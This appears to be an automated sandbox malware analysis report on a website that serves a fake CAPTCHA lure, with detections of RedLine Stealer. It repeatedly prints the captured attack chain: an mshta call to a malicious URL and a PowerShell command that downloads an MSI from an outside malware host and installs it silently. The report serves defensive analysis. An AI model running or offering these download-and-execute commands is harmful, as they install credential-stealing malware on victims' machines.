Edit tour

Windows Analysis Report
https://ravinn.com

Overview

General Information

Sample URL:https://ravinn.com
Analysis ID:1654130
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected RedLine Stealer
Drops large PE files
Found hidden mapped module (file has been removed from disk)
HTML page adds supicious text to clipboard
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Javascript checks online IP of machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: MsiExec Web Install
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1964,i,5450519922198028058,4023602434265028325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ravinn.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 8840 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 2112 cmdline: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G?? MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 2208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6112 cmdline: "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 640 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 58173891FD6DF8D2CFA7B3CDEE856639 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • launchultra.exe (PID: 8752 cmdline: "C:\Users\user\AppData\Local\Inkberry\launchultra.exe" MD5: 5B0C25D9CBA1796E5514EDDB17083A3F)
      • CasPol.exe (PID: 7896 cmdline: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe MD5: F61FA5CE25F885A9B1F549055C9911ED)
        • CasPol.exe (PID: 6852 cmdline: "C:\Users\user\AppData\Local\Temp\73763\CasPol.exe" MD5: F61FA5CE25F885A9B1F549055C9911ED)
      • gpupdate.exe (PID: 604 cmdline: C:\Windows\SysWOW64\gpupdate.exe MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8)
        • conhost.exe (PID: 4384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
SourceRuleDescriptionAuthorStrings
00000017.00000002.2188352785.0000000005453000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    0000001A.00000002.2340360326.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000001A.00000002.2340360326.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000017.00000002.2188352785.000000000554E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000017.00000002.2264964941.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 5 entries

            System Summary

            barindex
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", ProcessId: 2208, ProcessName: powershell.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", ProcessId: 2208, ProcessName: powershell.exe
            Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2208, TargetFilename: C:\Users\Public\7bc.msi
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", ProcessId: 2208, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", ProcessId: 2208, ProcessName: powershell.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", ProcessId: 2208, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://servverifcloud.com/ # I ?m not a robot: ?l?udflare V?rific?tion ID: 0?0-G??, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn", ProcessId: 2208, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8840, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-04-02T01:21:19.242300+020018100002Potentially Bad Traffic192.168.2.1649823104.21.69.191443TCP
            2025-04-02T01:21:19.924562+020018100002Potentially Bad Traffic192.168.2.1649825104.21.3.74443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://servverifcloud.com/Avira URL Cloud: Label: malware
            Source: https://mfktiaoaolfkfjzjk.com/pluAvira URL Cloud: Label: malware
            Source: https://static-tracking.klaviyo.com/onsite/js/fender_analytics.611d7935dc9085329d0a.js?cb=1HTTP Parser: (self.webpackchunk_klaviyo_onsite_modules=self.webpackchunk_klaviyo_onsite_modules||[]).push([[377],{23105:function(t,e,i){"use strict";e.z=({tracking:t})=>{var e;const o=t?"https://static-tracking.klaviyo.com/onsite/js/":"https://static.klaviyo.com/onsite/js/",n=null==(e=window.klaviyomodulesobject)?void 0:e.assetsource;i.p=n?`${o}${n}`:o}},650:function(t,e,i){"use strict";var o=i(23105);i(78991),i(24570),i(26650);class n{constructor(t,e,i,o,n,r,s){this.doc=t,this.nav=e,this.scr=i,this.win=o,this.loc=n,this.top=r,this.parent=s,this.initializedom()}initializedom(){this.doc=this.doc||document,this.nav=this.nav||navigator,this.scr=this.scr||window.screen,this.win=this.win||window,this.loc=this.loc||this.doc.location,this.top=this.top||window.top,this.parent=this.parent||window.parent}getdocument(){return this.doc}getnavigator(){return this.nav}getscreen(){return this.scr}getwindow(){return this.win}getlocation(){return this.loc}getprotocol(){return["https:","about:"].includes(this.loc.protocol)?"https://":"http...
            Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E3205E05-7972-45C4-8321-B26BB5BCDBB2}
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.165.132:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.27.152:443 -> 192.168.2.16:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.133:443 -> 192.168.2.16:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.27.152:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.27.152:443 -> 192.168.2.16:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.133:443 -> 192.168.2.16:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.133:443 -> 192.168.2.16:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.16:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.133:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.133:443 -> 192.168.2.16:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.16:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.69.191:443 -> 192.168.2.16:49823 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.3.74:443 -> 192.168.2.16:49825 version: TLS 1.2
            Source: C:\Windows\System32\msiexec.exeFile opened: z:
            Source: C:\Windows\System32\msiexec.exeFile opened: x:
            Source: C:\Windows\System32\msiexec.exeFile opened: v:
            Source: C:\Windows\System32\msiexec.exeFile opened: t:
            Source: C:\Windows\System32\msiexec.exeFile opened: r:
            Source: C:\Windows\System32\msiexec.exeFile opened: p:
            Source: C:\Windows\System32\msiexec.exeFile opened: n:
            Source: C:\Windows\System32\msiexec.exeFile opened: l:
            Source: C:\Windows\System32\msiexec.exeFile opened: j:
            Source: C:\Windows\System32\msiexec.exeFile opened: h:
            Source: C:\Windows\System32\msiexec.exeFile opened: f:
            Source: C:\Windows\System32\msiexec.exeFile opened: b:
            Source: C:\Windows\System32\msiexec.exeFile opened: y:
            Source: C:\Windows\System32\msiexec.exeFile opened: w:
            Source: C:\Windows\System32\msiexec.exeFile opened: u:
            Source: C:\Windows\System32\msiexec.exeFile opened: s:
            Source: C:\Windows\System32\msiexec.exeFile opened: q:
            Source: C:\Windows\System32\msiexec.exeFile opened: o:
            Source: C:\Windows\System32\msiexec.exeFile opened: m:
            Source: C:\Windows\System32\msiexec.exeFile opened: k:
            Source: C:\Windows\System32\msiexec.exeFile opened: i:
            Source: C:\Windows\System32\msiexec.exeFile opened: g:
            Source: C:\Windows\System32\msiexec.exeFile opened: e:
            Source: C:\Windows\System32\svchost.exeFile opened: c:
            Source: C:\Windows\System32\msiexec.exeFile opened: a:
            Source: chrome.exeMemory has grown: Private usage: 1MB later: 37MB
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49823 -> 104.21.69.191:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49825 -> 104.21.3.74:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
            Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
            Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
            Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
            Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.83
            Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.83
            Source: unknownTCP traffic detected without corresponding DNS query: 149.248.78.209
            Source: unknownTCP traffic detected without corresponding DNS query: 149.248.78.209
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ravinn.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.2 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/css/all.css HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/css/splide.min.css HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/css/bootstrap.css?v=1743482759 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/css/main.css?v=1743482759 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/css/responsive.css?v=1743482759 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
